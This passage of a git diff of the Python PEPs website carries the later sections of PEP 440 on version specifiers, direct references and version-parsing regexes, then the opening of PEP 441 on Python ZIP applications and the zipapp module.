Due to the nature of the simple installer API it is not possible for an +installer to be aware of which metadata version a particular distribution was +using. Additionally installers required the ability to create a reasonably +prioritized list that includes all, or as many as possible, versions of +a project to determine which versions it should install. These requirements +necessitate a standardization across one parsing mechanism to be used for all +versions of a project.

+

Due to the above, this PEP MUST be used for all versions of metadata and +supersedes PEP 386 even for metadata v1.2. Tools SHOULD ignore any versions +which cannot be parsed by the rules in this PEP, but MAY fall back to +implementation defined version parsing and ordering schemes if no versions +complying with this PEP are available.

+

Distribution users may wish to explicitly remove non-compliant versions from +any private package indexes they control.

+
+
+

Compatibility with other version schemes

+

Some projects may choose to use a version scheme which requires +translation in order to comply with the public version scheme defined in +this PEP. In such cases, the project specific version can be stored in the +metadata while the translated public version is published in the version field.

+

This allows automated distribution tools to provide consistently correct +ordering of published releases, while still allowing developers to use +the internal versioning scheme they prefer for their projects.

+
+

Semantic versioning

+

Semantic versioning is a popular version identification scheme that is +more prescriptive than this PEP regarding the significance of different +elements of a release number. Even if a project chooses not to abide by +the details of semantic versioning, the scheme is worth understanding as +it covers many of the issues that can arise when depending on other +distributions, and when publishing a distribution that others rely on.

+

The “Major.Minor.Patch” (described in this PEP as “major.minor.micro”) +aspects of semantic versioning (clauses 1-8 in the 2.0.0 specification) +are fully compatible with the version scheme defined in this PEP, and abiding +by these aspects is encouraged.

+

Semantic versions containing a hyphen (pre-releases - clause 10) or a +plus sign (builds - clause 11) are not compatible with this PEP +and are not permitted in the public version field.

+

One possible mechanism to translate such semantic versioning based source +labels to compatible public versions is to use the .devN suffix to +specify the appropriate version order.

+

Specific build information may also be included in local version labels.

+
+
+

DVCS based version labels

+

Many build tools integrate with distributed version control systems like +Git and Mercurial in order to add an identifying hash to the version +identifier. As hashes cannot be ordered reliably such versions are not +permitted in the public version field.

+

As with semantic versioning, the public .devN suffix may be used to +uniquely identify such releases for publication, while the original DVCS based +label can be stored in the project metadata.

+

Identifying hash information may also be included in local version labels.

+
+
+

Olson database versioning

+

The pytz project inherits its versioning scheme from the corresponding +Olson timezone database versioning scheme: the year followed by a lowercase +character indicating the version of the database within that year.

+

This can be translated to a compliant public version identifier as +<year>.<serial>, where the serial starts at zero or one (for the +‘<year>a’ release) and is incremented with each subsequent database +update within the year.

+

As with other translated version identifiers, the corresponding Olson +database version could be recorded in the project metadata.

+
+
+
+
+

Version specifiers

+

A version specifier consists of a series of version clauses, separated by +commas. For example:

+
~= 0.9, >= 1.0, != 1.3.4.*, < 2.0
+
+
+

The comparison operator determines the kind of version clause:

+ +

The comma (“,”) is equivalent to a logical and operator: a candidate +version must match all given version clauses in order to match the +specifier as a whole.

+

Whitespace between a conditional operator and the following version +identifier is optional, as is the whitespace around the commas.

+

When multiple candidate versions match a version specifier, the preferred +version SHOULD be the latest version as determined by the consistent +ordering defined by the standard Version scheme. Whether or not +pre-releases are considered as candidate versions SHOULD be handled as +described in Handling of pre-releases.

+

Except where specifically noted below, local version identifiers MUST NOT be +permitted in version specifiers, and local version labels MUST be ignored +entirely when checking if candidate versions match a given version +specifier.

+
+

Compatible release

+

A compatible release clause consists of the compatible release operator ~= +and a version identifier. It matches any candidate version that is expected +to be compatible with the specified version.

+

The specified version identifier must be in the standard format described in +Version scheme. Local version identifiers are NOT permitted in this +version specifier.

+

For a given release identifier V.N, the compatible release clause is +approximately equivalent to the pair of comparison clauses:

+
>= V.N, == V.*
+
+
+

This operator MUST NOT be used with a single segment version number such as +~=1.

+

For example, the following groups of version clauses are equivalent:

+
~= 2.2
+>= 2.2, == 2.*
+
+~= 1.4.5
+>= 1.4.5, == 1.4.*
+
+
+

If a pre-release, post-release or developmental release is named in a +compatible release clause as V.N.suffix, then the suffix is ignored +when determining the required prefix match:

+
~= 2.2.post3
+>= 2.2.post3, == 2.*
+
+~= 1.4.5a4
+>= 1.4.5a4, == 1.4.*
+
+
+

The padding rules for release segment comparisons means that the assumed +degree of forward compatibility in a compatible release clause can be +controlled by appending additional zeros to the version specifier:

+
~= 2.2.0
+>= 2.2.0, == 2.2.*
+
+~= 1.4.5.0
+>= 1.4.5.0, == 1.4.5.*
+
+
+
+
+

Version matching

+

A version matching clause includes the version matching operator == +and a version identifier.

+

The specified version identifier must be in the standard format described in +Version scheme, but a trailing .* is permitted on public version +identifiers as described below.

+

By default, the version matching operator is based on a strict equality +comparison: the specified version must be exactly the same as the requested +version. The only substitution performed is the zero padding of the +release segment to ensure the release segments are compared with the same +length.

+

Whether or not strict version matching is appropriate depends on the specific +use case for the version specifier. Automated tools SHOULD at least issue +warnings and MAY reject them entirely when strict version matches are used +inappropriately.

+

Prefix matching may be requested instead of strict comparison, by appending +a trailing .* to the version identifier in the version matching clause. +This means that additional trailing segments will be ignored when +determining whether or not a version identifier matches the clause. If the +specified version includes only a release segment, than trailing components +(or the lack thereof) in the release segment are also ignored.

+

For example, given the version 1.1.post1, the following clauses would +match or not as shown:

+
== 1.1        # Not equal, so 1.1.post1 does not match clause
+== 1.1.post1  # Equal, so 1.1.post1 matches clause
+== 1.1.*      # Same prefix, so 1.1.post1 matches clause
+
+
+

For purposes of prefix matching, the pre-release segment is considered to +have an implied preceding ., so given the version 1.1a1, the +following clauses would match or not as shown:

+
== 1.1        # Not equal, so 1.1a1 does not match clause
+== 1.1a1      # Equal, so 1.1a1 matches clause
+== 1.1.*      # Same prefix, so 1.1a1 matches clause if pre-releases are requested
+
+
+

An exact match is also considered a prefix match (this interpretation is +implied by the usual zero padding rules for the release segment of version +identifiers). Given the version 1.1, the following clauses would +match or not as shown:

+
== 1.1        # Equal, so 1.1 matches clause
+== 1.1.0      # Zero padding expands 1.1 to 1.1.0, so it matches clause
+== 1.1.dev1   # Not equal (dev-release), so 1.1 does not match clause
+== 1.1a1      # Not equal (pre-release), so 1.1 does not match clause
+== 1.1.post1  # Not equal (post-release), so 1.1 does not match clause
+== 1.1.*      # Same prefix, so 1.1 matches clause
+
+
+

It is invalid to have a prefix match containing a development or local release +such as 1.0.dev1.* or 1.0+foo1.*. If present, the development release +segment is always the final segment in the public version, and the local version +is ignored for comparison purposes, so using either in a prefix match wouldn’t +make any sense.

+

The use of == (without at least the wildcard suffix) when defining +dependencies for published distributions is strongly discouraged as it +greatly complicates the deployment of security fixes. The strict version +comparison operator is intended primarily for use when defining +dependencies for repeatable deployments of applications while using +a shared distribution index.

+

If the specified version identifier is a public version identifier (no +local version label), then the local version label of any candidate versions +MUST be ignored when matching versions.

+

If the specified version identifier is a local version identifier, then the +local version labels of candidate versions MUST be considered when matching +versions, with the public version identifier being matched as described +above, and the local version label being checked for equivalence using a +strict string equality comparison.

+
+
+

Version exclusion

+

A version exclusion clause includes the version exclusion operator != +and a version identifier.

+

The allowed version identifiers and comparison semantics are the same as +those of the Version matching operator, except that the sense of any +match is inverted.

+

For example, given the version 1.1.post1, the following clauses would +match or not as shown:

+
!= 1.1        # Not equal, so 1.1.post1 matches clause
+!= 1.1.post1  # Equal, so 1.1.post1 does not match clause
+!= 1.1.*      # Same prefix, so 1.1.post1 does not match clause
+
+
+
+
+

Inclusive ordered comparison

+

An inclusive ordered comparison clause includes a comparison operator and a +version identifier, and will match any version where the comparison is correct +based on the relative position of the candidate version and the specified +version given the consistent ordering defined by the standard +Version scheme.

+

The inclusive ordered comparison operators are <= and >=.

+

As with version matching, the release segment is zero padded as necessary to +ensure the release segments are compared with the same length.

+

Local version identifiers are NOT permitted in this version specifier.

+
+
+

Exclusive ordered comparison

+

The exclusive ordered comparisons > and < are similar to the inclusive +ordered comparisons in that they rely on the relative position of the candidate +version and the specified version given the consistent ordering defined by the +standard Version scheme. However, they specifically exclude pre-releases, +post-releases, and local versions of the specified version.

+

The exclusive ordered comparison >V MUST NOT allow a post-release +of the given version unless V itself is a post release. You may mandate +that releases are later than a particular post release, including additional +post releases, by using >V.postN. For example, >1.7 will allow +1.7.1 but not 1.7.0.post1 and >1.7.post2 will allow 1.7.1 +and 1.7.0.post3 but not 1.7.0.

+

The exclusive ordered comparison >V MUST NOT match a local version of +the specified version.

+

The exclusive ordered comparison <V MUST NOT allow a pre-release of +the specified version unless the specified version is itself a pre-release. +Allowing pre-releases that are earlier than, but not equal to a specific +pre-release may be accomplished by using <V.rc1 or similar.

+

As with version matching, the release segment is zero padded as necessary to +ensure the release segments are compared with the same length.

+

Local version identifiers are NOT permitted in this version specifier.

+
+
+

Arbitrary equality

+

Arbitrary equality comparisons are simple string equality operations which do +not take into account any of the semantic information such as zero padding or +local versions. This operator also does not support prefix matching as the +== operator does.

+

The primary use case for arbitrary equality is to allow for specifying a +version which cannot otherwise be represented by this PEP. This operator is +special and acts as an escape hatch to allow someone using a tool which +implements this PEP to still install a legacy version which is otherwise +incompatible with this PEP.

+

An example would be ===foobar which would match a version of foobar.

+

This operator may also be used to explicitly require an unpatched version +of a project such as ===1.0 which would not match for a version +1.0+downstream1.

+

Use of this operator is heavily discouraged and tooling MAY display a warning +when it is used.

+
+
+

Handling of pre-releases

+

Pre-releases of any kind, including developmental releases, are implicitly +excluded from all version specifiers, unless they are already present +on the system, explicitly requested by the user, or if the only available +version that satisfies the version specifier is a pre-release.

+

By default, dependency resolution tools SHOULD:

+
    +
  • accept already installed pre-releases for all version specifiers
  • +
  • accept remotely available pre-releases for version specifiers where +there is no final or post release that satisfies the version specifier
  • +
  • exclude all other pre-releases from consideration
  • +
+

Dependency resolution tools MAY issue a warning if a pre-release is needed +to satisfy a version specifier.

+

Dependency resolution tools SHOULD also allow users to request the +following alternative behaviours:

+
    +
  • accepting pre-releases for all version specifiers
  • +
  • excluding pre-releases for all version specifiers (reporting an error or +warning if a pre-release is already installed locally, or if a +pre-release is the only way to satisfy a particular specifier)
  • +
+

Dependency resolution tools MAY also allow the above behaviour to be +controlled on a per-distribution basis.

+

Post-releases and final releases receive no special treatment in version +specifiers - they are always included unless explicitly excluded.

+
+
+

Examples

+
    +
  • ~=3.1: version 3.1 or later, but not version 4.0 or later.
  • +
  • ~=3.1.2: version 3.1.2 or later, but not version 3.2.0 or later.
  • +
  • ~=3.1a1: version 3.1a1 or later, but not version 4.0 or later.
  • +
  • == 3.1: specifically version 3.1 (or 3.1.0), excludes all pre-releases, +post releases, developmental releases and any 3.1.x maintenance releases.
  • +
  • == 3.1.*: any version that starts with 3.1. Equivalent to the +~=3.1.0 compatible release clause.
  • +
  • ~=3.1.0, != 3.1.3: version 3.1.0 or later, but not version 3.1.3 and +not version 3.2.0 or later.
  • +
+
+
+
+

Direct references

+

Some automated tools may permit the use of a direct reference as an +alternative to a normal version specifier. A direct reference consists of +the specifier @ and an explicit URL.

+

Whether or not direct references are appropriate depends on the specific +use case for the version specifier. Automated tools SHOULD at least issue +warnings and MAY reject them entirely when direct references are used +inappropriately.

+

Public index servers SHOULD NOT allow the use of direct references in +uploaded distributions. Direct references are intended as a tool for +software integrators rather than publishers.

+

Depending on the use case, some appropriate targets for a direct URL +reference may be an sdist or a wheel binary archive. The exact URLs and +targets supported will be tool dependent.

+

For example, a local source archive may be referenced directly:

+
pip @ file:///localbuilds/pip-1.3.1.zip
+
+
+

Alternatively, a prebuilt archive may also be referenced:

+
pip @ file:///localbuilds/pip-1.3.1-py33-none-any.whl
+
+
+

All direct references that do not refer to a local file URL SHOULD specify +a secure transport mechanism (such as https) AND include an expected +hash value in the URL for verification purposes. If a direct reference is +specified without any hash information, with hash information that the +tool doesn’t understand, or with a selected hash algorithm that the tool +considers too weak to trust, automated tools SHOULD at least emit a warning +and MAY refuse to rely on the URL. If such a direct reference also uses an +insecure transport, automated tools SHOULD NOT rely on the URL.

+

It is RECOMMENDED that only hashes which are unconditionally provided by +the latest version of the standard library’s hashlib module be used +for source archive hashes. At time of writing, that list consists of +'md5', 'sha1', 'sha224', 'sha256', 'sha384', and +'sha512'.

+

For source archive and wheel references, an expected hash value may be +specified by including a <hash-algorithm>=<expected-hash> entry as +part of the URL fragment.

+

For version control references, the VCS+protocol scheme SHOULD be +used to identify both the version control system and the secure transport, +and a version control system with hash based commit identifiers SHOULD be +used. Automated tools MAY omit warnings about missing hashes for version +control systems that do not provide hash based commit identifiers.

+

To handle version control systems that do not support including commit or +tag references directly in the URL, that information may be appended to the +end of the URL using the @<commit-hash> or the @<tag>#<commit-hash> +notation.

+
+

Note

+

This isn’t quite the same as the existing VCS reference notation +supported by pip. Firstly, the distribution name is moved in front rather +than embedded as part of the URL. Secondly, the commit hash is included +even when retrieving based on a tag, in order to meet the requirement +above that every link should include a hash to make things harder to +forge (creating a malicious repo with a particular tag is easy, creating +one with a specific hash, less so).

+
+

Remote URL examples:

+
pip @ https://github.com/pypa/pip/archive/1.3.1.zip#sha1=da9234ee9982d4bbb3c72346a6de940a148ea686
+pip @ git+https://github.com/pypa/pip.git@7921be1537eac1e97bc40179a57f0349c2aee67d
+pip @ git+https://github.com/pypa/pip.git@1.3.1#7921be1537eac1e97bc40179a57f0349c2aee67d
+
+
+
+

File URLs

+

File URLs take the form of file://<host>/<path>. If the <host> is +omitted it is assumed to be localhost and even if the <host> is omitted +the third slash MUST still exist. The <path> defines what the file path on +the filesystem that is to be accessed.

+

On the various *nix operating systems the only allowed values for <host> +is for it to be omitted, localhost, or another FQDN that the current +machine believes matches its own host. In other words, on *nix the file:// +scheme can only be used to access paths on the local machine.

+

On Windows the file format should include the drive letter if applicable as +part of the <path> (e.g. file:///c:/path/to/a/file). Unlike *nix on +Windows the <host> parameter may be used to specify a file residing on a +network share. In other words, in order to translate \\machine\volume\file +to a file:// url, it would end up as file://machine/volume/file. For +more information on file:// URLs on Windows see MSDN [4].

+
+
+
+

Updating the versioning specification

+

The versioning specification may be updated with clarifications without +requiring a new PEP or a change to the metadata version.

+

Any technical changes that impact the version identification and comparison +syntax and semantics would require an updated versioning scheme to be +defined in a new PEP.

+
+
+

Summary of differences from pkg_resources.parse_version

+
    +
  • Note: this comparison is to pkg_resourses.parse_version as it existed at +the time the PEP was written. After the PEP was accepted, setuptools 6.0 and +later versions adopted the behaviour described in this PEP.
  • +
  • Local versions sort differently, this PEP requires that they sort as greater +than the same version without a local version, whereas +pkg_resources.parse_version considers it a pre-release marker.
  • +
  • This PEP purposely restricts the syntax which constitutes a valid version +while pkg_resources.parse_version attempts to provide some meaning from +any arbitrary string.
  • +
  • pkg_resources.parse_version allows arbitrarily deeply nested version +signifiers like 1.0.dev1.post1.dev5. This PEP however allows only a +single use of each type and they must exist in a certain order.
  • +
+
+
+

Summary of differences from PEP 386

+
    +
  • Moved the description of version specifiers into the versioning PEP
  • +
  • Added the “direct reference” concept as a standard notation for direct +references to resources (rather than each tool needing to invent its own)
  • +
  • Added the “local version identifier” and “local version label” concepts to +allow system integrators to indicate patched builds in a way that is +supported by the upstream tools, as well as to allow the incorporation of +build tags into the versioning of binary distributions.
  • +
  • Added the “compatible release” clause
  • +
  • Added the trailing wildcard syntax for prefix based version matching +and exclusion
  • +
  • Changed the top level sort position of the .devN suffix
  • +
  • Allowed single value version numbers
  • +
  • Explicit exclusion of leading or trailing whitespace
  • +
  • Explicit support for date based versions
  • +
  • Explicit normalisation rules to improve compatibility with +existing version metadata on PyPI where it doesn’t introduce +ambiguity
  • +
  • Implicitly exclude pre-releases unless they’re already present or +needed to satisfy a dependency
  • +
  • Treat post releases the same way as unqualified releases
  • +
  • Discuss ordering and dependencies across metadata versions
  • +
  • Switch from preferring c to rc.
  • +
+

The rationale for major changes is given in the following sections.

+
+

Changing the version scheme

+

One key change in the version scheme in this PEP relative to that in +PEP 386 is to sort top level developmental releases like X.Y.devN ahead +of alpha releases like X.Ya1. This is a far more logical sort order, as +projects already using both development releases and alphas/betas/release +candidates do not want their developmental releases sorted in +between their release candidates and their final releases. There is no +rationale for using dev releases in that position rather than +merely creating additional release candidates.

+

The updated sort order also means the sorting of dev versions is now +consistent between the metadata standard and the pre-existing behaviour +of pkg_resources (and hence the behaviour of current installation +tools).

+

Making this change should make it easier for affected existing projects to +migrate to the latest version of the metadata standard.

+

Another change to the version scheme is to allow single number +versions, similar to those used by non-Python projects like Mozilla +Firefox, Google Chrome and the Fedora Linux distribution. This is actually +expected to be more useful for version specifiers, but it is easier to +allow it for both version specifiers and release numbers, rather than +splitting the two definitions.

+

The exclusion of leading and trailing whitespace was made explicit after +a couple of projects with version identifiers differing only in a +trailing \n character were found on PyPI.

+

Various other normalisation rules were also added as described in the +separate section on version normalisation below.

+

Appendix A shows detailed results of an analysis of PyPI distribution +version information, as collected on 8th August, 2014. This analysis +compares the behavior of the explicitly ordered version scheme defined in +this PEP with the de facto standard defined by the behavior of setuptools. +These metrics are useful, as the intent of this PEP is to follow existing +setuptools behavior as closely as is feasible, while still throwing +exceptions for unorderable versions (rather than trying to guess an +appropriate order as setuptools does).

+
+
+

A more opinionated description of the versioning scheme

+

As in PEP 386, the primary focus is on codifying existing practices to make +them more amenable to automation, rather than demanding that existing +projects make non-trivial changes to their workflow. However, the +standard scheme allows significantly more flexibility than is needed +for the vast majority of simple Python packages (which often don’t even +need maintenance releases - many users are happy with needing to upgrade to a +new feature release to get bug fixes).

+

For the benefit of novice developers, and for experienced developers +wishing to better understand the various use cases, the specification +now goes into much greater detail on the components of the defined +version scheme, including examples of how each component may be used +in practice.

+

The PEP also explicitly guides developers in the direction of +semantic versioning (without requiring it), and discourages the use of +several aspects of the full versioning scheme that have largely been +included in order to cover esoteric corner cases in the practices of +existing projects and in repackaging software for Linux distributions.

+
+
+

Describing version specifiers alongside the versioning scheme

+

The main reason to even have a standardised version scheme in the first place +is to make it easier to do reliable automated dependency analysis. It makes +more sense to describe the primary use case for version identifiers alongside +their definition.

+
+
+

Changing the interpretation of version specifiers

+

The previous interpretation of version specifiers made it very easy to +accidentally download a pre-release version of a dependency. This in +turn made it difficult for developers to publish pre-release versions +of software to the Python Package Index, as even marking the package as +hidden wasn’t enough to keep automated tools from downloading it, and also +made it harder for users to obtain the test release manually through the +main PyPI web interface.

+

The previous interpretation also excluded post-releases from some version +specifiers for no adequately justified reason.

+

The updated interpretation is intended to make it difficult to accidentally +accept a pre-release version as satisfying a dependency, while still +allowing pre-release versions to be retrieved automatically when that’s the +only way to satisfy a dependency.

+

The “some forward compatibility assumed” version constraint is derived from the +Ruby community’s “pessimistic version constraint” operator [2] to allow +projects to take a cautious approach to forward compatibility promises, while +still easily setting a minimum required version for their dependencies. The +spelling of the compatible release clause (~=) is inspired by the Ruby +(~>) and PHP (~) equivalents.

+

Further improvements are also planned to the handling of parallel +installation of multiple versions of the same library, but these will +depend on updates to the installation database definition along with +improved tools for dynamic path manipulation.

+

The trailing wildcard syntax to request prefix based version matching was +added to make it possible to sensibly define compatible release clauses.

+
+
+

Support for date based version identifiers

+

Excluding date based versions caused significant problems in migrating +pytz to the new metadata standards. It also caused concerns for the +OpenStack developers, as they use a date based versioning scheme and would +like to be able to migrate to the new metadata standards without changing +it.

+
+
+

Adding version epochs

+

Version epochs are added for the same reason they are part of other +versioning schemes, such as those of the Fedora and Debian Linux +distributions: to allow projects to gracefully change their approach to +numbering releases, without having a new release appear to have a lower +version number than previous releases and without having to change the name +of the project.

+

In particular, supporting version epochs allows a project that was previously +using date based versioning to switch to semantic versioning by specifying +a new version epoch.

+

The ! character was chosen to delimit an epoch version rather than the +: character, which is commonly used in other systems, due to the fact that +: is not a valid character in a Windows directory name.

+
+
+

Adding direct references

+

Direct references are added as an “escape clause” to handle messy real +world situations that don’t map neatly to the standard distribution model. +This includes dependencies on unpublished software for internal use, as well +as handling the more complex compatibility issues that may arise when +wrapping third party libraries as C extensions (this is of especial concern +to the scientific community).

+

Index servers are deliberately given a lot of freedom to disallow direct +references, since they’re intended primarily as a tool for integrators +rather than publishers. PyPI in particular is currently going through the +process of eliminating dependencies on external references, as unreliable +external services have the effect of slowing down installation operations, +as well as reducing PyPI’s own apparent reliability.

+
+
+

Adding arbitrary equality

+

Arbitrary equality is added as an “escape clause” to handle the case where +someone needs to install a project which uses a non compliant version. Although +this PEP is able to attain ~97% compatibility with the versions that are +already on PyPI there are still ~3% of versions which cannot be parsed. This +operator gives a simple and effective way to still depend on them without +having to “guess” at the semantics of what they mean (which would be required +if anything other than strict string based equality was supported).

+
+
+

Adding local version identifiers

+

It’s a fact of life that downstream integrators often need to backport +upstream bug fixes to older versions. It’s one of the services that gets +Linux distro vendors paid, and application developers may also apply patches +they need to bundled dependencies.

+

Historically, this practice has been invisible to cross-platform language +specific distribution tools - the reported “version” in the upstream +metadata is the same as for the unmodified code. This inaccuracy can then +cause problems when attempting to work with a mixture of integrator +provided code and unmodified upstream code, or even just attempting to +identify exactly which version of the software is installed.

+

The introduction of local version identifiers and “local version labels” +into the versioning scheme, with the corresponding python.integrator +metadata extension allows this kind of activity to be represented +accurately, which should improve interoperability between the upstream +tools and various integrated platforms.

+

The exact scheme chosen is largely modeled on the existing behavior of +pkg_resources.parse_version and pkg_resources.parse_requirements, +with the main distinction being that where pkg_resources currently always +takes the suffix into account when comparing versions for exact matches, +the PEP requires that the local version label of the candidate version be +ignored when no local version label is present in the version specifier +clause. Furthermore, the PEP does not attempt to impose any structure on +the local version labels (aside from limiting the set of permitted +characters and defining their ordering).

+

This change is designed to ensure that an integrator provided version like +pip 1.5+1 or pip 1.5+1.git.abc123de will still satisfy a version +specifier like pip>=1.5.

+

The plus is chosen primarily for readability of local version identifiers. +It was chosen instead of the hyphen to prevent +pkg_resources.parse_version from parsing it as a prerelease, which is +important for enabling a successful migration to the new, more structured, +versioning scheme. The plus was chosen instead of a tilde because of the +significance of the tilde in Debian’s version ordering algorithm.

+
+
+

Providing explicit version normalization rules

+

Historically, the de facto standard for parsing versions in Python has been the +pkg_resources.parse_version command from the setuptools project. This does +not attempt to reject any version and instead tries to make something +meaningful, with varying levels of success, out of whatever it is given. It has +a few simple rules but otherwise it more or less relies largely on string +comparison.

+

The normalization rules provided in this PEP exist primarily to either increase +the compatibility with pkg_resources.parse_version, particularly in +documented use cases such as rev, r, pre, etc or to do something +more reasonable with versions that already exist on PyPI.

+

All possible normalization rules were weighed against whether or not they were +likely to cause any ambiguity (e.g. while someone might devise a scheme where +v1.0 and 1.0 are considered distinct releases, the likelihood of anyone +actually doing that, much less on any scale that is noticeable, is fairly low). +They were also weighed against how pkg_resources.parse_version treated a +particular version string, especially with regards to how it was sorted. Finally +each rule was weighed against the kinds of additional versions it allowed, how +“ugly” those versions looked, how hard there were to parse (both mentally and +mechanically) and how much additional compatibility it would bring.

+

The breadth of possible normalizations were kept to things that could easily +be implemented as part of the parsing of the version and not pre-parsing +transformations applied to the versions. This was done to limit the side +effects of each transformation as simple search and replace style transforms +increase the likelihood of ambiguous or “junk” versions.

+

For an extended discussion on the various types of normalizations that were +considered, please see the proof of concept for PEP 440 within pip [5].

+
+
+

Allowing Underscore in Normalization

+

There are not a lot of projects on PyPI which utilize a _ in the version +string. However this PEP allows its use anywhere that - is acceptable. The +reason for this is that the Wheel normalization scheme specifies that - +gets normalized to a _ to enable easier parsing of the filename.

+
+
+
+

Summary of changes to PEP 440

+

The following changes were made to this PEP based on feedback received after +the initial reference implementation was released in setuptools 8.0 and pip +6.0:

+
    +
  • The exclusive ordered comparisons were updated to no longer imply a !=V.* +which was deemed to be surprising behavior which was too hard to accurately +describe. Instead the exclusive ordered comparisons will simply disallow +matching pre-releases, post-releases, and local versions of the specified +version (unless the specified version is itself a pre-release, post-release +or local version). For an extended discussion see the threads on +distutils-sig [6] [7].
  • +
  • The normalized form for release candidates was updated from ‘c’ to ‘rc’. +This change was based on user feedback received when setuptools 8.0 +started applying normalisation to the release metadata generated when +preparing packages for publication on PyPI [8].
  • +
  • The PEP text and the is_canonical regex were updated to be explicit +that numeric components are specifically required to be represented as +sequences of ASCII digits, not arbitrary Unicode [Nd] code points. This +was previously implied by the version parsing regex in Appendix B, but +not stated explicitly [10].
  • +
+
+
+

References

+

The initial attempt at a standardised version scheme, along with the +justifications for needing such a standard can be found in PEP 386.

+ + +
+
+

Appendix A

+

Metadata v2.0 guidelines versus setuptools:

+
$ invoke check.pep440
+Total Version Compatibility:              245806/250521 (98.12%)
+Total Sorting Compatibility (Unfiltered): 45441/47114 (96.45%)
+Total Sorting Compatibility (Filtered):   47057/47114 (99.88%)
+Projects with No Compatible Versions:     498/47114 (1.06%)
+Projects with Differing Latest Version:   688/47114 (1.46%)
+
+
+
+
+

Appendix B : Parsing version strings with regular expressions

+

As noted earlier in the Public version identifiers section, published +version identifiers SHOULD use the canonical format. This section provides +regular expressions that can be used to test whether a version is already +in that form, and if it’s not, extract the various components for subsequent +normalization.

+

To test whether a version identifier is in the canonical format, you can use +the following function:

+
import re
+def is_canonical(version):
+    return re.match(r'^([1-9][0-9]*!)?(0|[1-9][0-9]*)(\.(0|[1-9][0-9]*))*((a|b|rc)(0|[1-9][0-9]*))?(\.post(0|[1-9][0-9]*))?(\.dev(0|[1-9][0-9]*))?$', version) is not None
+
+
+

To extract the components of a version identifier, use the following regular +expression (as defined by the packaging +project):

+
VERSION_PATTERN = r"""
+    v?
+    (?:
+        (?:(?P<epoch>[0-9]+)!)?                           # epoch
+        (?P<release>[0-9]+(?:\.[0-9]+)*)                  # release segment
+        (?P<pre>                                          # pre-release
+            [-_\.]?
+            (?P<pre_l>alpha|a|beta|b|preview|pre|c|rc)
+            [-_\.]?
+            (?P<pre_n>[0-9]+)?
+        )?
+        (?P<post>                                         # post release
+            (?:-(?P<post_n1>[0-9]+))
+            |
+            (?:
+                [-_\.]?
+                (?P<post_l>post|rev|r)
+                [-_\.]?
+                (?P<post_n2>[0-9]+)?
+            )
+        )?
+        (?P<dev>                                          # dev release
+            [-_\.]?
+            (?P<dev_l>dev)
+            [-_\.]?
+            (?P<dev_n>[0-9]+)?
+        )?
+    )
+    (?:\+(?P<local>[a-z0-9]+(?:[-_\.][a-z0-9]+)*))?       # local version
+"""
+
+_regex = re.compile(
+    r"^\s*" + VERSION_PATTERN + r"\s*$",
+    re.VERBOSE | re.IGNORECASE,
+)
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0440.rst

+

Last modified: 2024-11-24 08:20:53 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0441/index.html b/pep-0441/index.html new file mode 100644 index 00000000000..75155954eff --- /dev/null +++ b/pep-0441/index.html @@ -0,0 +1,479 @@ + + + + + + + + PEP 441 – Improving Python ZIP Application Support | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 441 – Improving Python ZIP Application Support

+
+
Author:
+
Daniel Holth <dholth at gmail.com>, +Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Python-Dev message
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Mar-2013
+
Python-Version:
+
3.5
+
Post-History:
+
30-Mar-2013, 01-Apr-2013, 16-Feb-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Improving Python ZIP Application Support

+

Python has had the ability to execute directories or ZIP-format +archives as scripts since version 2.6 [1]. When invoked with a zip +file or directory as its first argument the interpreter adds that +directory to sys.path and executes the __main__ module. These +archives provide a great way to publish software that needs to be +distributed as a single file script but is complex enough to need to +be written as a collection of modules.

+

This feature is not as popular as it should be mainly because it was +not promoted as part of Python 2.6 [2], so that it is relatively +unknown, but also because the Windows installer does not register a +file extension (other than .py) for this format of file, to associate +with the launcher.

+

This PEP proposes to fix these problems by re-publicising the feature, +defining the .pyz and .pyzw extensions as “Python ZIP Applications” +and “Windowed Python ZIP Applications”, and providing some simple +tooling to manage the format.

+
+
+

A New Python ZIP Application Extension

+

The terminology “Python Zip Application” will be the formal term used +for a zip-format archive that contains Python code in a form that can +be directly executed by Python (specifically, it must have a +__main__.py file in the root directory of the archive). The +extension .pyz will be formally associated with such files.

+

The Python 3.5 installer will associate .pyz and .pyzw “Python +Zip Applications” with the platform launcher so they can be executed. +A .pyz archive is a console application and a .pyzw archive is a +windowed application, indicating whether the console should appear +when running the app.

+

On Unix, it would be ideal if the .pyz extension and the name +“Python Zip Application” were registered (in the mime types database?). +However, such an association is out of scope for this PEP.

+

Python Zip applications can be prefixed with a #! line +pointing to the correct Python interpreter and an optional +explanation:

+
#!/usr/bin/env python3
+#  Python application packed with zipapp module
+(binary contents of archive)
+
+
+

On Unix, this allows the OS to run the file with the correct +interpreter, via the standard “shebang” support. On Windows, the +Python launcher implements shebang support.

+

However, it is always possible to execute a .pyz application by +supplying the filename to the Python interpreter directly.

+

As background, ZIP archives are defined with a footer containing +relative offsets from the end of the file. They remain valid when +concatenated to the end of any other file. This feature is completely +standard and is how self-extracting ZIP archives and the bdist_wininst +installer format work.

+
+
+

Minimal Tooling: The zipapp Module

+

This PEP also proposes including a module for working with these +archives. The module will contain functions for working with Python +zip application archives, and a command line interface (via python +-m zipapp) for their creation and manipulation.

+

More complete tools for managing Python Zip Applications are +encouraged as 3rd party applications on PyPI. Currently, pyzzer [5] +and pex [6] are two such tools.

+
+

Module Interface

+

The zipapp module will provide the following functions:

+
+

create_archive(source, target=None, interpreter=None, main=None)

+

Create an application archive from source. The source can be any +of the following:

+
    +
  • The name of a directory, in which case a new application archive +will be created from the content of that directory.
  • +
  • The name of an existing application archive file, in which case the +file is copied to the target. The file name should include the +.pyz or .pyzw extension, if required.
  • +
  • A file object open for reading in bytes mode. The content of the +file should be an application archive, and the file object is +assumed to be positioned at the start of the archive.
  • +
+

The target argument determines where the resulting archive will be +written:

+
    +
  • If it is the name of a file, the archive will be written to that +file.
  • +
  • If it is an open file object, the archive will be written to that +file object, which must be open for writing in bytes mode.
  • +
